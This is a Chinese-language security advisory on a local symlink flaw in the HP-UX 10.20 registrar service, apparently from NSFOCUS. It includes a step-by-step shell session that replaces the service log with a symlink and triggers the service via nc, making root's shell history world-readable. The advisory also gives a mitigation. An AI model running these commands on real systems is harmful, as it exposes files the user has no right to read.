发布日期：2000-11-09
更新日期：2000-11-09

受影响系统：

HP-UX 10.20

描述：

---

HP-UX 10.20携带的registrar服务存在一个漏洞，允许本地用户读取文件系统中任意
文件，该服务监听TCP/1712口，使用日志文件/etc/opt/resmon/log/registrar.log

缺省安装后/etc/opt/resmon/log目录允许所有用户移动日志文件，通常到1712端口
的连接出现时，由root创建、写入日志文件。

恶意的本地用户可以移动已经存在的日志文件，创建一个名为registrar.log的符号
链接到任意的本来无权访问的文件，此后到1712端口的连接出现时，符号链接所指向
的文件权限被修改成0644(全局可读)，日志数据追加在文件尾部。

这将带来极大的本地安全危害。

<* 来源：J.A. Gutierrez (spd@gtc1.cps.unizar.es) *>


测试方法：

---

警 告

以下程序(方法)可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！

$ uname -sr
HP-UX B.10.20
$ cd /etc/opt/resmon/log
$ mv registrar.log registrar.log.orig
$ ls -l /.sh_history
-rw------- 1 root sys 3316 Sep 20 15:22 /.sh_history
$ ln -s /.sh_history registrar.log
$ nc hpux.example.com 1712 < /etc/motd
$ ls -l /.sh_history
-rw-r--r-- 2 root sys 3605 Nov 8 09:45 /.sh_history
$ rm -f registrar.log
$ mv registrar.log.orig registrar.log


建议：

---

临时解决办法：

NSFOCUS建议您确保只有root可访问/etc/opt/resmon/log目录

厂商补丁：

暂无



浏览次数：6237
严重程度：0（网友投票）